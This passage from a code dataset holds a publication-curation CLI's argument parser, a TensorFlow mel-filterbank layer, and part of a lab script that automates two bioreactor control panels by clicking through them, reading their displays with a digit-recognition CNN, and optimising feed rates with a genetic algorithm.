\"\n + \"It contains two main functions: \"\n + \"1) Supporting curation of newly reported publications. \"\n + \"2) Library reporting. \"\n + \"**Supporting Curation**: \"\n + \"The --match function is used to combine: \"\n + \" a) a DB of publications we have already looked at. \"\n + \" b) a library (currently in Zotero or CiteULike) of pubs \"\n + \" that have already been identified as relevant. \"\n + \" c) A set of publication alerts. \"\n + \"into an HTML page containing all newly report publications \"\n + \"and links to those publications to help curate them. \"\n + \"**Library Reporting**: \"\n + \"The --report function generated the selected library report.\"))\n\n arg_parser.add_argument(\n \"--match\", required=False, action=\"store_true\",\n help=(\n \"Match newly reported pubs with each other and with optional \"\n + \"libraries of already curated pubs. Generates an HTML page \"\n + \"that to use to curate the new pubs.\"))\n arg_parser.add_argument(\n \"--report\", required=False, action=\"store_true\",\n help=(\n \"Generate a library report.\"))\n\n common_args = arg_parser.add_argument_group(\n title=\"Common arguments\", description=None)\n common_args.add_argument(\n \"--libtype\", required=True,\n help=(\n \"What type of of 'already accepted pubs' library are we reading \"\n + \"in and updating? Options are \"\n + lib_types.get_lib_types_as_text_list() + \".\"))\n common_args.add_argument(\n \"--inputlibpath\", required=True,\n help=(\n \"Path to the library of already accepted pubs. This is typically \"\n + \"exported from the library service.\"))\n common_args.add_argument(\n \"--onlineliburl\", required=True,\n help=(\n \"Base URL of the online version of the library of already \"\n + \"accepted pubs. Used to generate links.\"))\n\n match_args = arg_parser.add_argument_group(\n title=\"Match arguments\", description=None)\n match_args.add_argument(\n \"--email\", required=False,\n help=(\n \"Email account to pull new pub alerts from.\"))\n match_args.add_argument(\n \"--mailbox\", required=False,\n help=(\n \"Optional mailbox within email account to limit notifications \"\n + \"from.\"))\n match_args.add_argument(\n \"--imaphost\", required=False,\n help=(\n \"Address of --email's IMAP server. For GMail this is \"\n + \"imap.gmail.com.\"))\n match_args.add_argument(\n \"--since\", required=False,\n help=(\n \"Only look at alerts from after this date. \"\n + \"Format: DD-Mmm-YYYY. Example: 01-Dec-2014.\"))\n match_args.add_argument(\n \"--before\", required=False,\n help=(\n \"Optional. Only look at alerts before this date. \"\n + \"Format: DD-Mmm-YYYY. Example: 01-Jan-2015.\"))\n match_args.add_argument(\n \"--sources\", required=False,\n help=(\n \"Which alert sources to process. Is either 'all' or a \"\n + \"comma-separated list (no spaces) from these sources: \"\n + alert_sources.get_alert_sources_as_text_list()))\n match_args.add_argument(\n \"--proxy\", required=False,\n help=(\n \"String to insert in URLs to access pubs through your paywall. \"\n + \"For Johns Hopkins, for example, this is: \"\n + \"'.proxy1.library.jhu.edu'\"))\n match_args.add_argument(\n \"--proxyseparator\", required=False,\n help=(\n \"Some proxies replace dots in the original pub URL with dashes. \"\n + \"Default is dots.\"),\n choices=['dot', 'dash'], default=\"dot\")\n match_args.add_argument(\n \"--customsearchurl\", required=False,\n help=(\n \"URL to use for custom searches at your institution. 
The title \"\n + \"of the publication will be added to the end of this URL.\"))\n match_args.add_argument(\n \"--knownpubsin\", required=False,\n help=(\n \"Path to existing known pubs DB. This is the list of publications \"\n + \"you have already looked at. Typically generated from the \"\n + \"previous PubSpork run. In TSV format.\"))\n match_args.add_argument(\n \"--knownpubsout\", required=False,\n help=\"Where to put the new known pubs DB (in TSV format).\")\n match_args.add_argument(\n \"--okduplicatetitles\", required=False,\n help=(\n \"Text file containing duplicate titles that have been reviewed \"\n + \"and are in fact not duplicate titles. These will not get \"\n + \"reported as duplicates.\"))\n match_args.add_argument(\n \"--excludesearches\", required = False,\n help=(\n \"Exclude searches look for matches that we want to exclude \"\n + \"from our results. These are useful because it is sometimes \"\n + \"easier to list each exclude search, each in a separate search \"\n + \"then to include all the excludes in each search (and \"\n + \"sometimes we can't make the search that long).\"))\n match_args.add_argument(\n \"--curationpage\", required=False,\n help=(\n \"Where to put the HTML page listing all the pubs. Required for \"\n + \" match runs.\"))\n\n report_args = arg_parser.add_argument_group(\n title=\"Report arguments\", description=None)\n report_args.add_argument(\n \"--reportformat\", required=False,\n help=(\n \"What format to generate the report in. Options are \"\n + report_formats.get_formats_as_text_list()\n + \".\"))\n arg_parser.add_argument(\n \"--journal\", required=False, action=\"store_true\",\n help=\"Produce table showing number of papers in different journals.\")\n arg_parser.add_argument(\n \"--year\", required=False, action=\"store_true\",\n help=\"Produce table showing number of papers published each year.\")\n report_args.add_argument(\n \"--tagyear\", required=False, action=\"store_true\",\n help=(\n \"Produce table showing number of papers with each tag, \"\n + \"each year.\"))\n report_args.add_argument(\n \"--yeartag\", required=False, action=\"store_true\",\n help=(\n \"Produce table showing number of papers with each year, \"\n + \"each tag.\"))\n report_args.add_argument(\n \"--tagcountdaterange\", required=False, action=\"store_true\",\n help=(\n \"Produce table showing number of papers that were tagged with \"\n + \"each tag during a given time period. --entrystartdate and \"\n + \"--entryenddate parameters are required if --tagcountdaterange \"\n + \"is specified.\"))\n report_args.add_argument(\n \"--pubsdaterange\", required=False, action=\"store_true\",\n help=(\n \"Produce list of publications in the given date range. What is \"\n + \"included depends on the --reportformat. --entrystartdate and \"\n + \"--entryenddate parameters are required if --pubsdaterange \"\n + \"is specified.\"))\n report_args.add_argument(\n \"--entrystartdate\", required=False,\n help=(\n \"--tagcountdaterange will report on papers with entry dates \"\n + \"greater than or equal to this date. Example: 2016-12-29. \"))\n report_args.add_argument(\n \"--entryenddate\", required=False,\n help=(\n \"--tagcountdaterange will report on papers with entry dates \"\n + \"less than or equal to this date. Example: 2017-01-29. \"))\n report_args.add_argument(\n \"--onlythesetags\", required=False,\n help=(\n \"Can either generate a report about all tags in the library, \"\n + \"or, only about a subset of tags. 
If this parameter is given \"\n + \"then only the tags listed in this file will be reported on. \"\n + \"List one tag per line.\"))\n report_args.add_argument(\n \"--numtagcolumngroups\", required=False, type=int, default=4,\n help=(\n \"Specifies how many tags (and their counts) should be listed \"\n + \"in each row of a tag report. Default is 4.\"))\n\n args = arg_parser.parse_args()\n\n if args.match:\n # split comma separated list of sources\n args.sources = args.sources.split(\",\")\n\n return args\n\n\nargs = get_args()\n\nif args.match:\n match_pubs.match_pubs(args)\nelif args.report:\n generate_lib_report.generate_lib_report(args)\n","repo_name":"tnabtaf/pub_spork","sub_path":"pub_spork.py","file_name":"pub_spork.py","file_ext":"py","file_size_in_byte":9232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10089618418","text":"import tensorflow as tf\nimport tensorflow_addons as tfa\n\nclass MelFilterbanks(tf.keras.layers.Layer):\n def __init__(self,\n n_filters = 64,\n sample_rate = 16000,\n n_fft = 512,\n window_len = 25.,\n window_stride = 10.,\n min_freq = 60.0,\n max_freq = 7800.0,\n **kwargs):\n super().__init__(**kwargs)\n\n self._n_filters = n_filters\n self._sample_rate = sample_rate\n self._n_fft = n_fft\n self._window_len = int(sample_rate * window_len // 1000 + 1)\n self._window_stride = int(sample_rate * window_stride // 1000)\n self._min_freq = min_freq\n self._max_freq = max_freq if max_freq else sample_rate / 2.\n\n self.mel_filters = tf.signal.linear_to_mel_weight_matrix(\n num_mel_bins=self._n_filters,\n num_spectrogram_bins=self._n_fft // 2 + 1,\n sample_rate=self._sample_rate,\n lower_edge_hertz=self._min_freq,\n upper_edge_hertz=self._max_freq)\n\n def call(self, inputs: tf.Tensor) -> tf.Tensor:\n if inputs.shape.ndims == 3:\n if inputs.shape[-1] != 1:\n raise ValueError(\"Only one channel supported but got inputs\"\n f\" with shape {inputs.shape}\")\n inputs = tf.squeeze(inputs, axis=-1)\n\n stft = tf.signal.stft(\n inputs,\n frame_length=self._window_len,\n frame_step=self._window_stride,\n fft_length=self._n_fft,\n pad_end=True)\n\n spectrogram = tf.math.square(tf.math.abs(stft))\n mel_filterbanks = tf.matmul(spectrogram, self.mel_filters)\n mel_filterbanks = tf.math.log(mel_filterbanks + 1e-5)\n return mel_filterbanks\n","repo_name":"Zaharah/ood_audio","sub_path":"melfb.py","file_name":"melfb.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20926382946","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 13 14:13:07 2021\n\n@author: 577\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nfrom sko.GA import GA\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport pandas as pd\nimport numpy as np\n\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport win32con\nimport win32gui\nimport win32com.client\n\nimport pyautogui\n\nfrom PyQt5.QtWidgets import QApplication\nfrom PyQt5.QtGui import *\n\nimport requests\nimport json\n\nimport sys\nimport time\nimport os\nimport random\nimport warnings\n\n\nshell = win32com.client.Dispatch(\"WScript.Shell\")\nshell.SendKeys('%')\n\n#avoiding warning\n\nwarnings.filterwarnings(\"ignore\")\n\n#reproduct\n\nseed = 
577\n\nnp.random.seed(seed)\nrandom.seed(seed)\n\ntorch.manual_seed(seed)\ntorch.cuda.manual_seed(seed)\ntorch.cuda.manual_seed_all(seed)\n\ntorch.backends.cudnn.benchmark = True\ntorch.backends.cudnn.deterministic = True\n\n\n\ndef opt_L():\n \n ga = GA(func=opt_min_L, n_dim=1, size_pop=20, max_iter=20, lb=[1.1], ub=[5], precision=1e-7)\n \n best_x, best_y = ga.run()\n \n print('best_x:', best_x, '\\n', 'best_y:', best_y)\n\n return best_x, best_y\n\ndef opt_R():\n \n ga = GA(func=opt_min_R, n_dim=1, size_pop=20, max_iter=20, lb=[1.1], ub=[5], precision=1e-7)\n \n best_x, best_y = ga.run()\n \n print('best_x:', best_x, '\\n', 'best_y:', best_y)\n\n return best_x, best_y\n\n\ndef opt_min_L(x):\n \n global var_L_G\n global var_L_P\n \n global G\n global P\n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-2) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n core_net = core_init(0)\n \n LX2 = LX1 + (x[0]*5)*2.1\n \n tmp_x = np.array([[LX0,LX1,LX2,LX3,LX4]])\n \n tmp_x = core_1_minMax_input.transform(tmp_x)\n \n tmp_x = torch.Tensor(tmp_x)\n \n tmp_x = torch.unsqueeze(tmp_x,dim=1)\n \n y = core_net(tmp_x).detach().numpy()\n \n G = core_1_minMax_output.inverse_transform(np.array([[y[0,0,0],y[0,0,1]]]))[0,0]\n \n P = core_1_minMax_output.inverse_transform(np.array([[y[0,0,0],y[0,0,1]]]))[0,1]\n \n core_net = core_init(0.1)\n \n result = (G-10)**2 + 50*(1/(P+1))**2\n \n print(G)\n \n print(P)\n\n\n return result\n\n\ndef opt_min_R(x):\n \n global var_R_G\n global var_R_P\n \n global G\n global P\n \n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-2) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n core_init(0)\n \n RX2 = RX1 + (x[0]*5)*(62/30)\n \n tmp_x = np.array([[RX0,RX1,RX2,RX3,RX4]])\n \n tmp_x = core_1_minMax_input.transform(tmp_x)\n \n tmp_x = torch.Tensor(tmp_x)\n \n tmp_x = torch.unsqueeze(tmp_x,dim=1)\n \n y = core_net(tmp_x).detach().numpy()\n \n G = core_1_minMax_output.inverse_transform(np.array([[y[0,0,0],y[0,0,1]]]))[0,0]\n \n P = core_1_minMax_output.inverse_transform(np.array([[y[0,0,0],y[0,0,1]]]))[0,1]\n \n core_init(0.1)\n \n result = (G-15)**2 + 50*(1/(P+1))**2\n \n\n\n return result\n\ndef data_loading():\n \n global train_x\n global train_y\n global test_x\n global test_y\n global proof_x\n global proof_y\n global core_1_minMax_input\n global core_1_minMax_output\n global core_2_minMax_input\n global core_2_minMax_output\n \n \n data = np.array(pd.read_excel('data_new.xlsx'))\n\n x = data[:,0:5] # without T\n y = data[:,6:8]\n \n \n core_1_minMax_input = MinMaxScaler()\n \n core_1_minMax_input.fit(x)\n \n \n \n core_1_minMax_output = MinMaxScaler()\n \n core_1_minMax_output.fit(y)\n \n\n\n data = np.array(pd.read_excel('data_new_new.xlsx'))\n \n x = data[:,0:4] # without T\n y = data[:,5:7]\n \n core_2_minMax_input = MinMaxScaler()\n \n core_2_minMax_input.fit(x)\n \n \n core_2_minMax_output = MinMaxScaler()\n \n core_2_minMax_output.fit(y)\n \n\n\ndef core_init(drop_out_rate):\n \n global core_net\n # global core\n \n class core(nn.Module):\n \n def __init__(self):\n \n super(core, self).__init__()\n \n self.layer1 = nn.Linear(5, 60)\n \n self.layer2 = nn.Linear(60, 60)\n \n self.layer3 = nn.Linear(60, 60)\n \n self.layer4 = nn.Linear(60, 60)\n \n self.layer5 = nn.Linear(60, 60)\n \n self.layer6 = nn.Linear(60, 60)\n \n self.layer7 = nn.Linear(60, 60)\n \n self.layer8 = nn.Linear(60, 60)\n\n self.layer9 = nn.Linear(60, 2)\n \n \n def forward(self, x):\n \n x1 = F.relu(self.layer1(x))\n \n x2 = F.relu(self.layer2(x1))\n \n x3 = 
F.relu(self.layer3(x2))\n \n x4 = F.relu(self.layer4(x3))\n \n x5 = F.relu(self.layer5(x4))\n \n x6 = F.relu(self.layer6(x5))\n \n x7 = F.relu(self.layer7(x6))\n \n x8 = F.relu(self.layer8(x7))\n\n \n \n output = self.layer9(x8) \n \n return output\n\n \n core_net = core()\n\n core_net.load_state_dict(torch.load(path + '\\\\final_core.pth.tar', map_location='cpu'))\n \n # net.cuda()\n \n # net.cpu()\n \n return core_net\n\n\n\n\ndef core_init2():\n \n global core_net2\n # global core2\n \n \n class core2(nn.Module):\n \n def __init__(self):\n super(core2, self).__init__()\n \n self.layer1 = nn.Linear(4, 80)\n \n self.layer2 = nn.Linear(80, 80)\n \n self.layer3 = nn.Linear(80, 80)\n \n self.layer4 = nn.Linear(80, 80)\n \n self.layer5 = nn.Linear(80, 2)\n \n \n def forward(self, x):\n \n x1 = F.relu(self.layer1(x))\n \n x2 = F.relu(self.layer2(x1))\n \n x3 = F.relu(self.layer3(x2))\n \n x4 = F.relu(self.layer4(x3))\n \n output = self.layer5(x4) \n \n return output\n\n \n core_net2 = core2()\n\n core_net2.load_state_dict(torch.load(path + '\\\\final_core2.pth.tar', map_location='cpu'))\n \n # net.cuda()\n \n # net.cpu()\n \n return core_net2\n\nclass CNN(nn.Module):\n\n def __init__(self):\n\n super(CNN, self).__init__()\n\n self.conv1 = nn.Sequential(nn.Conv2d(in_channels=1, out_channels=16, kernel_size=5, stride=1, padding=2,),\n nn.ReLU(), nn.MaxPool2d(kernel_size=2),)\n\n self.conv2 = nn.Sequential(nn.Conv2d(16, 32, 5, 1, 2), nn.ReLU(), nn.MaxPool2d(2),)\n\n self.out = nn.Linear(32 * 7 * 7, 10)\n\n def forward(self, x):\n\n x = self.conv1(x)\n\n x = self.conv2(x)\n\n x = x.view(x.size(0), -1)\n\n output = self.out(x)\n\n return output\n\ndef cnn_init():\n \n global cnn_net\n \n cnn_net = CNN()\n \n cnn_net.load_state_dict(torch.load( path + '\\\\final_mnist.pth.tar',map_location='cpu'))\n \n # net.cuda()\n \n # net.cpu()\n \n return cnn_net\n \n\ndef img_reading_gray(path):\n \n img = cv2.imread(path)\n \n gray_img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)\n \n return gray_img\n\n\ndef img_bindary(img,trend=60):\n \n _ , bindary_gray = cv2.threshold( img , trend, 255, cv2.THRESH_BINARY)\n \n return bindary_gray\n\n\ndef on_off_check(img,function):\n \n # x y reverse comparing to ImageLabelling\n \n function_table_x = {\n \n 'acid':[284, 300],\n 'baset':[331, 348],\n 'folet':[379, 396],\n 'subst':[428, 444],\n \n }\n \n function_table_y = {\n \n 'acid':[160, 201],\n 'baset':[162, 201],\n 'folet':[162, 201],\n 'subst':[162, 201],\n \n }\n \n area = img[function_table_x[function][0]:function_table_x[function][1],\n function_table_y[function][0]:function_table_y[function][1]]\n \n return area\n \n \ndef speed_img_get(img,function):\n \n # x y reverse comparing to ImageLabelling\n \n function_table_x = {\n \n 'acid':[284, 300],\n 'baset':[331, 348],\n 'folet':[379, 396],\n 'subst':[427, 444],\n \n }\n\n function_table_y = {\n \n 'acid':[160, 182],\n 'baset':[160, 181],\n 'folet':[162, 181],\n 'subst':[160, 181],\n \n }\n \n area = img[function_table_x[function][0]:function_table_x[function][1],\n function_table_y[function][0]:function_table_y[function][1]]\n \n return area \n\ndef counter_img_get(img,function):\n \n # x y reverse comparing to ImageLabelling\n \n function_table_x = {\n \n 'acid':[301, 326],\n 'baset':[349, 373],\n 'folet':[397, 422],\n 'subst':[445, 470],\n 'stirr':[120, 145],\n 'temp':[206, 229],\n 'ph':[253, 277],\n \n }\n \n function_table_y = {\n \n 'acid':[65, 114],\n 'baset':[65, 115],\n 'folet':[65, 115],\n 'subst':[65, 115],\n 'stirr':[564, 605],\n 'temp':[661, 697],\n 
'ph':[660, 698],\n \n }\n \n area = img[function_table_x[function][0]:function_table_x[function][1],\n function_table_y[function][0]:function_table_y[function][1]]\n \n return area\n\ndef area_divid_cnn_check(area, ):\n \n plt.imshow(area)\n plt.show()\n \n # global cut_y_direaction\n # global bound_y_begin\n # global bound_y_end\n \n bound_y_begin = []\n bound_y_end = []\n \n mark = 0\n \n for i in range(area.shape[1]):\n \n if mark == 0:\n \n if False in (area[:,i] == 255):\n \n bound_y_begin.append(i)\n \n mark = 1\n \n else:\n \n if not(False in (area[:,i] == 255)):\n \n bound_y_end.append(i)\n \n mark = 0\n \n if len(bound_y_begin) != len(bound_y_end):\n \n bound_y_end.append(i)\n \n \n cut_y_direaction = []\n \n # avoiding the edge\n \n for i in range(len(bound_y_begin)):\n \n cut_y_direaction.append(area[:,bound_y_begin[i]:bound_y_end[i]])\n \n \n cut_final = []\n \n for i in cut_y_direaction:\n \n bound_x_begin = []\n bound_x_end = []\n \n mark = 0\n \n for j in range(i.shape[0]):\n \n if mark == 0:\n \n if False in (i[j,:] == 255):\n \n bound_x_begin.append(j)\n \n mark = 1\n \n elif mark == 1:\n \n if not(False in (i[j,:] == 255)):\n \n bound_x_end.append(j)\n \n mark = 0\n \n\n \n for j in range(len(bound_x_begin)):\n \n cut_final.append(i[bound_x_begin[j]:bound_x_end[j],:])\n\n cnn_check = []\n\n real_number = []\n \n for i in cut_final:\n \n if i.shape[0] < 3 and i.shape[1] < 3:\n \n cnn_check.append(0)\n \n real_number.append('.')\n \n else:\n \n cnn_check.append(1)\n \n real_number.append('fuck')\n \n \n return cut_final, cnn_check, real_number\n \n\ndef padding_28_28(img):\n \n img = -img + 255\n \n final_img = np.zeros([28,28],dtype='uint8')\n \n a = img.shape[0]\n \n b = img.shape[1]\n \n \n if a >= b:\n \n img_resize = cv2.resize(img, (int((20/a)*b),20))\n \n final_img[int(final_img.shape[0]/2-img_resize.shape[0]/2):int(final_img.shape[0]/2-img_resize.shape[0]/2) + img_resize.shape[0], \n int(final_img.shape[1]/2-img_resize.shape[1]/2):int(final_img.shape[1]/2-img_resize.shape[1]/2) + img_resize.shape[1]] = img_resize\n \n elif a < b:\n \n img_resize = cv2.resize(img, (20,int((20/b)*a)))\n \n final_img[int(final_img.shape[0]/2-img_resize.shape[0]/2):int(final_img.shape[0]/2-img_resize.shape[0]/2) + img_resize.shape[0],\n int(final_img.shape[1]/2-img_resize.shape[1]/2):int(final_img.shape[1]/2-img_resize.shape[1]/2) + img_resize.shape[1]] = img_resize\n \n \n return final_img/255\n\n\n\ndef mnist(net,img_list, cnn_check, real_number):\n \n # global mnist_img\n \n mnist_img = []\n \n for i in range(len(cnn_check)):\n \n if cnn_check[i] == 1:\n \n mnist_img.append(padding_28_28(img_list[i]))\n \n mnist_img = torch.Tensor(np.array(mnist_img)).unsqueeze(dim=1)\n \n predict_result = torch.max(net(mnist_img),1)[1].numpy().tolist()\n \n for i in range(len(cnn_check)):\n \n if cnn_check[i] == 1:\n \n real_number[i] = str(predict_result[0])\n \n del predict_result[0]\n \n number = ''\n \n for i in real_number:\n \n number += i\n \n number = float(number)\n \n return number\n \ndef rt_speed_reading(net, path, function):\n \n mm = area_divid_cnn_check(img_bindary(speed_img_get(img_reading_gray(path),function)))\n \n num = mnist(net,mm[0],mm[1],mm[2])\n \n return num\n\n\ndef rt_counter_reading(net, path, function):\n \n # global mm\n \n # Bug_repairing\n \n mm = area_divid_cnn_check(img_bindary(counter_img_get(img_reading_gray(path),function)))\n \n num = mnist(net,mm[0],mm[1],mm[2])\n \n return num\n\ndef off_line(path,function):\n \n os.chdir(path)\n \n files = os.listdir()\n \n 
files.sort()\n \n data = []\n \n for i in files:\n \n data.append(rt_counter_reading(i, function))\n \n plt.plot(data)\n \n plt.show()\n \n return np.array(data)\n\n\n\ndef get_hwnd():\n \n \n handle_left = 0\n \n handle_right = 0\n \n right = 'PC-Panel 礑CU - right - 10.50.131.37 [full access]'\n\n left = 'PC-Panel 礑CU - left - 10.50.129.29 [full access]'\n\n hwnd_title = dict()\n \n def get_all_hwnd(hwnd,mouse):\n \n if win32gui.IsWindow(hwnd) and win32gui.IsWindowEnabled(hwnd) and win32gui.IsWindowVisible(hwnd):\n \n hwnd_title.update({hwnd:win32gui.GetWindowText(hwnd)})\n \n win32gui.EnumWindows(get_all_hwnd, 0)\n \n \n for h,t in hwnd_title.items():\n \n if t != \"\":\n \n # print(h, t)\n \n if t == right:\n \n handle_right = h\n \n if t == left:\n \n handle_left = h\n \n \n return handle_left, handle_right\n\ndef show_postion(hwnd):\n \n rect = win32gui.GetWindowRect(hwnd)\n \n x = rect[0]\n \n y = rect[1]\n \n w = rect[2] - x\n \n h = rect[3] - y\n \n print(\"Window %s:\" % win32gui.GetWindowText(hwnd))\n \n print(\"\\tLocation: (%d, %d)\" % (x, y))\n \n print(\"\\t Size: (%d, %d)\" % (w, h))\n \n return x,y\n\ndef recover_position():\n \n handle_left, handle_right = get_hwnd()\n \n left_x, left_y = show_postion(handle_left)\n \n right_x, right_y = show_postion(handle_right)\n \n # left\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%') \n \n win32gui.SetForegroundWindow(handle_left)\n \n click_position_x = left_x + 400\n \n click_position_y = left_y + 10\n \n pyautogui.moveTo(click_position_x, click_position_y, duration = 0.5)\n \n pyautogui.mouseDown()\n \n pyautogui.moveRel(-left_x, -left_y, duration = 2)\n \n pyautogui.mouseUp()\n\n #right\n \n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%')\n \n win32gui.SetForegroundWindow(handle_right)\n \n click_position_x = right_x + 400\n \n click_position_y = right_y + 10\n \n pyautogui.moveTo(click_position_x, click_position_y, duration = 0.5)\n \n pyautogui.mouseDown()\n \n pyautogui.moveRel(-right_x, -right_y, duration = 2)\n \n pyautogui.mouseUp()\n\n\n\ndef control_panel_location(handle):\n \n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%') \n \n win32gui.SetForegroundWindow(handle)\n \n x, y = show_postion(handle)\n \n control_panel_x = x + 20\n \n control_panel_y = y + 600\n \n pyautogui.moveTo(control_panel_x, control_panel_y, duration = 0.5)\n \n pyautogui.click()\n \n \ndef trend_plot_location(handle):\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%') \n \n win32gui.SetForegroundWindow(handle)\n \n x, y = show_postion(handle)\n \n trend_plot_x = x + 150\n \n trend_plot_y = y + 600\n \n pyautogui.moveTo(trend_plot_x, trend_plot_y, duration = 0.5)\n \n pyautogui.click()\n\ndef screen(time,handle,ID):\n\n shell = win32com.client.Dispatch(\"WScript.Shell\")\n \n shell.SendKeys('%') \n \n win32gui.SetForegroundWindow(handle)\n \n hwnd = handle\n \n app = QApplication(sys.argv)\n \n screen = QApplication.primaryScreen()\n \n img = screen.grabWindow(hwnd).toImage()\n \n img.save(str(time)+ '_' + ID + \".jpg\")\n\n\ndef function_click(handle, function):\n \n #without edge\n \n function_table = {\n \n 'acid':[44, 297],\n 'baset':[39, 354],\n 'folet':[36, 398],\n 'subst':[45, 446],\n 'stirr':[537, 126],\n 'temp':[756, 206],\n 'ph':[755, 252],\n \n }\n \n x, y = show_postion(handle)\n \n pyautogui.moveTo(x + 3 + function_table[function][0], y + 25 + function_table[function][1], duration = 0.5)\n \n pyautogui.click()\n \n 
\ndef switch_click(handle, function):\n \n #without edge\n \n switch_table = {\n \n 'acid':[177, 290],\n 'baset':[178, 339],\n 'folet':[179, 387],\n 'subst':[176, 434],\n \n }\n \n x, y = show_postion(handle)\n \n pyautogui.moveTo(x + 3 + switch_table[function][0], y + 25 + switch_table[function][1], duration = 0.5)\n \n pyautogui.click()\n\n \ndef switch_on_off_auto(handle, state):\n \n #with edge\n \n on_off_table = {\n \n 'off':[357, 279],\n 'on':[358, 334],\n 'auto':[358, 386],\n 'ok':[446, 467],\n \n }\n \n x, y = show_postion(handle)\n \n pyautogui.moveTo(x + on_off_table[state][0], y + on_off_table[state][1], duration = 0.5)\n \n pyautogui.click()\n \n pyautogui.moveTo(x + on_off_table['ok'][0], y + on_off_table['ok'][1], duration = 0.5)\n \n pyautogui.click()\n\n \ndef number_panel(handle, num):\n \n #with edge\n \n number_table = {\n \n \n '0':[316, 427],\n '1':[267, 374],\n '2':[313, 378],\n '3':[362, 377],\n '4':[267, 325],\n '5':[314, 327],\n '6':[363, 328],\n '7':[267, 276],\n '8':[316, 274],\n '9':[365, 275],\n '.':[363, 426],\n 'ok':[538, 483] \n\n }\n \n x, y = show_postion(handle)\n \n number = str(num)\n \n for i in number:\n \n pyautogui.moveTo(x + number_table[i][0], y + number_table[i][1], duration = 0.5)\n \n pyautogui.click()\n \n pyautogui.moveTo(x + number_table['ok'][0], y + number_table['ok'][1], duration = 0.5)\n \n pyautogui.click()\n\n\n \ndef number_panel_on_off_auto(handle, state):\n \n #with edge\n \n on_off_table = {\n \n 'on':[443, 275],\n 'off':[446, 335],\n 'auto':[442, 375],\n 'ok':[542, 486],\n \n }\n \n x, y = show_postion(handle)\n \n pyautogui.moveTo(x + on_off_table[state][0], y + on_off_table[state][1], duration = 0.5)\n \n pyautogui.click()\n \n pyautogui.moveTo(x + on_off_table['ok'][0], y + on_off_table['ok'][1], duration = 0.5)\n \n pyautogui.click()\n\n\ndef main(LGHPLC0, RGHPLC0,LOD0, ROD0):\n \n # init\n \n global path\n \n global Time_points\n \n global L_B\n global L_G\n \n global R_B\n global R_G\n \n global LX0\n global LX1\n global LX2\n global LX3\n global LX4\n \n global RX0\n global RX1\n global RX2\n global RX3\n global RX4\n \n global begin_feed_L\n global begin_feed_R\n \n global goal_L\n global goal_R\n \n global Now_G_L_Rate\n global Now_G_R_Rate\n \n global handle_left\n global handle_right\n \n Now_G_L_Rate = 10\n \n Now_G_R_Rate = 10\n \n path = os.getcwd()\n \n Time_points = []\n \n L_B = []\n \n L_G = []\n \n R_B = []\n \n R_G = []\n \n begin_feed_L = 0\n \n begin_feed_R = 0\n \n cnn_init()\n \n core_init(0)\n \n core_init2()\n \n time_resoliton = 10 #unit:min\n \n # working flow\n \n handle_left, handle_right = get_hwnd()\n \n start_time = int(time.time())\n \n os.chdir('Chonpca')\n \n os.mkdir(str(start_time))\n \n os.chdir(str(start_time))\n \n start_time = int(time.time())\n \n recover_position()\n \n \n control_panel_location(handle_right)\n \n screen(start_time,handle_right,'right_control')\n \n trend_plot_location(handle_right)\n \n screen(start_time,handle_right,'right_trend')\n \n control_panel_location(handle_right)\n \n \n control_panel_location(handle_left)\n \n screen(start_time,handle_left,'left_control')\n \n trend_plot_location(handle_left)\n \n screen(start_time,handle_left,'left_trend')\n \n control_panel_location(handle_left)\n \n # input: GHPLC(0) GCOUNTER(T) GSET(T+1) BCOUNTER(T) B(T)-B(T-1) \n \n # output: GHPLC(T+1) PDOHPLC(T+1)\n \n Time_points.append(start_time)\n \n LX0 = LGHPLC0\n\n LX1 = rt_counter_reading(cnn_net, str(start_time) + '_left_control.jpg', 'subst')*2.1\n \n LX2 = None\n \n LX3 = 
rt_counter_reading(cnn_net, str(start_time) + '_left_control.jpg', 'baset')*1\n \n LX4 = None\n \n L_G.append(LX1)\n \n L_B.append(LX3)\n \n \n RX0 = RGHPLC0\n \n RX1 = rt_counter_reading(cnn_net, str(start_time) + '_right_control.jpg', 'subst')*(62/30)\n \n RX2 = None\n \n RX3 = rt_counter_reading(cnn_net, str(start_time) + '_right_control.jpg', 'baset')*(31/50)\n \n RX4 = None\n \n R_G.append(RX1)\n \n R_B.append(RX3)\n \n # data upload\n \n while True:\n \n # recording\n \n now_time = int(time.time())\n \n if (now_time - start_time)%60 == 0:\n \n handle_left, handle_right = get_hwnd()\n \n recover_position()\n \n \n control_panel_location(handle_right)\n \n screen(now_time,handle_right,'right_control')\n \n trend_plot_location(handle_right)\n \n screen(now_time,handle_right,'right_trend')\n \n control_panel_location(handle_right)\n \n \n control_panel_location(handle_left)\n \n screen(now_time,handle_left,'left_control')\n \n trend_plot_location(handle_left)\n \n screen(now_time,handle_left,'left_trend')\n \n control_panel_location(handle_left)\n \n # data_collect\n \n if (now_time - start_time) <= 3700:\n \n # BEFORE 1H\n \n \n Time_points.append(now_time)\n \n LX0 = LGHPLC0\n \n LX1 = rt_counter_reading(cnn_net, str(now_time) + '_left_control.jpg', 'subst')*2.1\n \n LX2 = None\n \n LX3 = rt_counter_reading(cnn_net, str(now_time) + '_left_control.jpg', 'baset')*1\n \n LX4 = None\n \n L_G.append(LX1)\n \n L_B.append(LX3)\n\n \n RX0 = RGHPLC0\n \n RX1 = rt_counter_reading(cnn_net, str(now_time) + '_right_control.jpg', 'subst')*(62/30)\n \n RX2 = None\n \n RX3 = rt_counter_reading(cnn_net, str(now_time) + '_right_control.jpg', 